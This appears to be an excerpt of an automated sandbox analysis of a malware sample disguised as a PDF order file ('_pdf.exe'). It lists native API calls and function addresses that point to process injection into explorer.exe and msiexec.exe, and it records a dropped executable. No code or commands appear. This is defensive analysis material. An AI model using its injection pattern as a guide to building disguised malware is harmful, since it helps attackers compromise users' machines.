Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612FE0 NtCreateFile,LdrInitializeThunk,	7_2_01612FE0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612FB0 NtResumeThread,LdrInitializeThunk,	7_2_01612FB0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612F90 NtProtectVirtualMemory,LdrInitializeThunk,	7_2_01612F90
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_01612EA0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612E80 NtReadVirtualMemory,LdrInitializeThunk,	7_2_01612E80
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01614340 NtSetContextThread,	7_2_01614340
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01614650 NtSuspendThread,	7_2_01614650
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612BE0 NtQueryValueKey,	7_2_01612BE0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612BA0 NtEnumerateValueKey,	7_2_01612BA0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612B80 NtQueryInformationFile,	7_2_01612B80
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612AF0 NtWriteFile,	7_2_01612AF0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612AB0 NtWaitForSingleObject,	7_2_01612AB0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612D00 NtSetInformationFile,	7_2_01612D00
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612DB0 NtEnumerateKey,	7_2_01612DB0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612C60 NtCreateKey,	7_2_01612C60
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612C00 NtQueryInformationProcess,	7_2_01612C00
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612CF0 NtOpenProcess,	7_2_01612CF0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612CC0 NtQueryVirtualMemory,	7_2_01612CC0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612F60 NtCreateProcessEx,	7_2_01612F60
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612FA0 NtQuerySection,	7_2_01612FA0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612E30 NtWriteVirtualMemory,	7_2_01612E30
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612EE0 NtQueueApcThread,	7_2_01612EE0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01613010 NtOpenDirectoryObject,	7_2_01613010
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01613090 NtSetValueKey,	7_2_01613090
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016135C0 NtCreateMutant,	7_2_016135C0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016139B0 NtGetContextThread,	7_2_016139B0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01613D70 NtOpenThread,	7_2_01613D70
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01613D10 NtOpenProcessToken,	7_2_01613D10
Source: C:\Windows\explorer.exe	Code function: 8_2_1004CE12 NtProtectVirtualMemory,	8_2_1004CE12
Source: C:\Windows\explorer.exe	Code function: 8_2_1004B232 NtCreateFile,	8_2_1004B232
Source: C:\Windows\explorer.exe	Code function: 8_2_1004CE0A NtProtectVirtualMemory,	8_2_1004CE0A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_003F63E3 GetVersionExW,GetCurrentProcess,NtQueryInformationProcess,GetCommandLineW,GetStdHandle,GetFileType,memset,memset,RegQueryValueExW,RegCloseKey,RegQueryValueExW,RegCloseKey,CompareStringW,CompareStringW,CompareStringW,memset,GlobalFree,lstrlenW,GlobalFree,CoInitialize,CoRegisterClassObject,GetCurrentThread,OpenThreadToken,GetLastError,OpenEventW,WaitForSingleObject,CloseHandle,RevertToSelf,RegCloseKey,RegEnumKeyW,RevertToSelf,GetCurrentProcess,OpenProcessToken,GetTokenInformation,EqualSid,CloseHandle,GetLastError,memset,CloseHandle,MakeAbsoluteSD,GetLastError,CloseHandle,CloseHandle,CreateEventW,CloseHandle,CreateEventW,CloseHandle,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,CloseHandle,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,TranslateMessage,DispatchMessageW,PeekMessageW,MsgWaitForMultipleObjects,CloseHandle,GetLastError,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CloseHandle,CloseHandle,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CoRevokeClassObject,CoUninitialize,GetLastError,GetMessageW,TranslateMessage,DispatchMessageW,	11_2_003F63E3
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22CA0 NtQueryInformationToken,LdrInitializeThunk,	11_2_04C22CA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22C60 NtCreateKey,LdrInitializeThunk,	11_2_04C22C60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22C70 NtFreeVirtualMemory,LdrInitializeThunk,	11_2_04C22C70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22DD0 NtDelayExecution,LdrInitializeThunk,	11_2_04C22DD0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22DF0 NtQuerySystemInformation,LdrInitializeThunk,	11_2_04C22DF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22D10 NtMapViewOfSection,LdrInitializeThunk,	11_2_04C22D10
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	11_2_04C22EA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22FE0 NtCreateFile,LdrInitializeThunk,	11_2_04C22FE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22F30 NtCreateSection,LdrInitializeThunk,	11_2_04C22F30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22AD0 NtReadFile,LdrInitializeThunk,	11_2_04C22AD0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22B60 NtClose,LdrInitializeThunk,	11_2_04C22B60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C235C0 NtCreateMutant,LdrInitializeThunk,	11_2_04C235C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C24650 NtSuspendThread,	11_2_04C24650
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C24340 NtSetContextThread,	11_2_04C24340
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22CC0 NtQueryVirtualMemory,	11_2_04C22CC0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22CF0 NtOpenProcess,	11_2_04C22CF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22C00 NtQueryInformationProcess,	11_2_04C22C00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22DB0 NtEnumerateKey,	11_2_04C22DB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22D00 NtSetInformationFile,	11_2_04C22D00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22D30 NtUnmapViewOfSection,	11_2_04C22D30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22EE0 NtQueueApcThread,	11_2_04C22EE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22E80 NtReadVirtualMemory,	11_2_04C22E80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22E30 NtWriteVirtualMemory,	11_2_04C22E30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22F90 NtProtectVirtualMemory,	11_2_04C22F90
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22FA0 NtQuerySection,	11_2_04C22FA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22FB0 NtResumeThread,	11_2_04C22FB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22F60 NtCreateProcessEx,	11_2_04C22F60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22AF0 NtWriteFile,	11_2_04C22AF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22AB0 NtWaitForSingleObject,	11_2_04C22AB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22BE0 NtQueryValueKey,	11_2_04C22BE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22BF0 NtAllocateVirtualMemory,	11_2_04C22BF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22B80 NtQueryInformationFile,	11_2_04C22B80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C22BA0 NtEnumerateValueKey,	11_2_04C22BA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C23090 NtSetValueKey,	11_2_04C23090
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C23010 NtOpenDirectoryObject,	11_2_04C23010
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C23D70 NtOpenThread,	11_2_04C23D70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C23D10 NtOpenProcessToken,	11_2_04C23D10
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C239B0 NtGetContextThread,	11_2_04C239B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02D0A350 NtCreateFile,	11_2_02D0A350
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02D0A480 NtClose,	11_2_02D0A480
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02D0A400 NtReadFile,	11_2_02D0A400
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02D0A3FA NtReadFile,	11_2_02D0A3FA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02D0A34A NtCreateFile,	11_2_02D0A34A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02D0A47B NtClose,	11_2_02D0A47B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04B0A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,	11_2_04B0A036
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04B09BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	11_2_04B09BAF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04B0A042 NtQueryInformationProcess,	11_2_04B0A042
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04B09BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	11_2_04B09BB2

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 0_2_0236D384	0_2_0236D384
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 0_2_06A1A638	0_2_06A1A638
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 0_2_06A1A628	0_2_06A1A628
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 0_2_06A144C0	0_2_06A144C0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 0_2_06A1A638	0_2_06A1A638
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 0_2_06A163C8	0_2_06A163C8
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 0_2_06A163D8	0_2_06A163D8
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 0_2_06A10006	0_2_06A10006
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 0_2_06A10040	0_2_06A10040
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 0_2_06A16D88	0_2_06A16D88
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 0_2_06A14D30	0_2_06A14D30
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 0_2_06A1C8B0	0_2_06A1C8B0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 0_2_06A11890	0_2_06A11890
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 0_2_06A148F8	0_2_06A148F8
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0041E825	7_2_0041E825
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_00401030	7_2_00401030
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0041D965	7_2_0041D965
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0041DC45	7_2_0041DC45
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0041E458	7_2_0041E458
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0041EC11	7_2_0041EC11
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_00402D88	7_2_00402D88
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_00402D90	7_2_00402D90
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_00409E4B	7_2_00409E4B
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_00409E50	7_2_00409E50
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0041EEDD	7_2_0041EEDD
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0041DF79	7_2_0041DF79
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0041D79C	7_2_0041D79C
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_00402FB0	7_2_00402FB0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01668158	7_2_01668158
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D0100	7_2_015D0100
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167A118	7_2_0167A118
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016981CC	7_2_016981CC
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016A01AA	7_2_016A01AA
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01672000	7_2_01672000
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0169A352	7_2_0169A352
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016A03E6	7_2_016A03E6
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015EE3F0	7_2_015EE3F0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01680274	7_2_01680274
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016602C0	7_2_016602C0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E0535	7_2_015E0535
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016A0591	7_2_016A0591
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01692446	7_2_01692446
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01684420	7_2_01684420
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0168E4F6	7_2_0168E4F6
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E0770	7_2_015E0770
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01604750	7_2_01604750
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DC7C0	7_2_015DC7C0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015FC6E0	7_2_015FC6E0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015F6962	7_2_015F6962
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016AA9A6	7_2_016AA9A6
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E29A0	7_2_015E29A0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E2840	7_2_015E2840
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015EA840	7_2_015EA840
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160E8F0	7_2_0160E8F0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015C68B8	7_2_015C68B8
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0169AB40	7_2_0169AB40
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01696BD7	7_2_01696BD7
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DEA80	7_2_015DEA80
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015EAD00	7_2_015EAD00
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167CD1F	7_2_0167CD1F
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DADE0	7_2_015DADE0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015F8DBF	7_2_015F8DBF
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E0C00	7_2_015E0C00
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D0CF2	7_2_015D0CF2
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01680CB5	7_2_01680CB5
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01654F40	7_2_01654F40
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01622F28	7_2_01622F28
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01600F30	7_2_01600F30
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01682F30	7_2_01682F30
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D2FC8	7_2_015D2FC8
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015ECFE0	7_2_015ECFE0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0165EFA0	7_2_0165EFA0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E0E59	7_2_015E0E59
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0169EE26	7_2_0169EE26
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0169EEDB	7_2_0169EEDB
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015F2E90	7_2_015F2E90
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0169CE93	7_2_0169CE93
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016AB16B	7_2_016AB16B
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0161516C	7_2_0161516C
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015CF172	7_2_015CF172
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015EB1B0	7_2_015EB1B0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016970E9	7_2_016970E9
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0169F0E0	7_2_0169F0E0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E70C0	7_2_015E70C0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0168F0CC	7_2_0168F0CC
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015CD34C	7_2_015CD34C
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0169132D	7_2_0169132D
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0162739A	7_2_0162739A
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016812ED	7_2_016812ED
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015FB2C0	7_2_015FB2C0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E52A0	7_2_015E52A0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01697571	7_2_01697571
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167D5B0	7_2_0167D5B0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D1460	7_2_015D1460
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0169F43F	7_2_0169F43F
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0169F7B0	7_2_0169F7B0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016916CC	7_2_016916CC
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E9950	7_2_015E9950
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015FB950	7_2_015FB950
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01675910	7_2_01675910
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0164D800	7_2_0164D800
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E38E0	7_2_015E38E0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0169FB76	7_2_0169FB76
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01655BF0	7_2_01655BF0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0161DBF9	7_2_0161DBF9
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015FFB80	7_2_015FFB80
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01653A6C	7_2_01653A6C
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0169FA49	7_2_0169FA49
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01697A46	7_2_01697A46
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0168DAC6	7_2_0168DAC6
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01625AA0	7_2_01625AA0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167DAAC	7_2_0167DAAC
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01681AA3	7_2_01681AA3
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01697D73	7_2_01697D73
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E3D40	7_2_015E3D40
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01691D5A	7_2_01691D5A
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015FFDC0	7_2_015FFDC0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01659C32	7_2_01659C32
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0169FCF2	7_2_0169FCF2
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0169FF09	7_2_0169FF09
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E1F92	7_2_015E1F92
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0169FFB1	7_2_0169FFB1
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E9EB0	7_2_015E9EB0
Source: C:\Windows\explorer.exe	Code function: 8_2_1004B232	8_2_1004B232
Source: C:\Windows\explorer.exe	Code function: 8_2_1004A036	8_2_1004A036
Source: C:\Windows\explorer.exe	Code function: 8_2_10041082	8_2_10041082
Source: C:\Windows\explorer.exe	Code function: 8_2_10042D02	8_2_10042D02
Source: C:\Windows\explorer.exe	Code function: 8_2_10048912	8_2_10048912
Source: C:\Windows\explorer.exe	Code function: 8_2_10045B30	8_2_10045B30
Source: C:\Windows\explorer.exe	Code function: 8_2_10045B32	8_2_10045B32
Source: C:\Windows\explorer.exe	Code function: 8_2_1004E5CD	8_2_1004E5CD
Source: C:\Windows\explorer.exe	Code function: 8_2_10562036	8_2_10562036
Source: C:\Windows\explorer.exe	Code function: 8_2_10559082	8_2_10559082
Source: C:\Windows\explorer.exe	Code function: 8_2_10560912	8_2_10560912
Source: C:\Windows\explorer.exe	Code function: 8_2_1055AD02	8_2_1055AD02
Source: C:\Windows\explorer.exe	Code function: 8_2_105665CD	8_2_105665CD
Source: C:\Windows\explorer.exe	Code function: 8_2_10563232	8_2_10563232
Source: C:\Windows\explorer.exe	Code function: 8_2_1055DB30	8_2_1055DB30
Source: C:\Windows\explorer.exe	Code function: 8_2_1055DB32	8_2_1055DB32
Source: C:\Windows\explorer.exe	Code function: 8_2_106DE036	8_2_106DE036
Source: C:\Windows\explorer.exe	Code function: 8_2_106D5082	8_2_106D5082
Source: C:\Windows\explorer.exe	Code function: 8_2_106D6D02	8_2_106D6D02
Source: C:\Windows\explorer.exe	Code function: 8_2_106DC912	8_2_106DC912
Source: C:\Windows\explorer.exe	Code function: 8_2_106E25CD	8_2_106E25CD
Source: C:\Windows\explorer.exe	Code function: 8_2_106DF232	8_2_106DF232
Source: C:\Windows\explorer.exe	Code function: 8_2_106D9B30	8_2_106D9B30
Source: C:\Windows\explorer.exe	Code function: 8_2_106D9B32	8_2_106D9B32
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Code function: 10_2_012ED384	10_2_012ED384
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Code function: 10_2_05206E38	10_2_05206E38
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Code function: 10_2_05200007	10_2_05200007
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Code function: 10_2_05200040	10_2_05200040
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Code function: 10_2_05206E28	10_2_05206E28
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Code function: 10_2_07189902	10_2_07189902
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Code function: 10_2_07184D30	10_2_07184D30
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Code function: 10_2_07189902	10_2_07189902
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Code function: 10_2_07186D88	10_2_07186D88
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Code function: 10_2_071844C0	10_2_071844C0
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Code function: 10_2_0718BB78	10_2_0718BB78
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Code function: 10_2_071863D8	10_2_071863D8
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Code function: 10_2_071863C8	10_2_071863C8
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Code function: 10_2_0718001F	10_2_0718001F
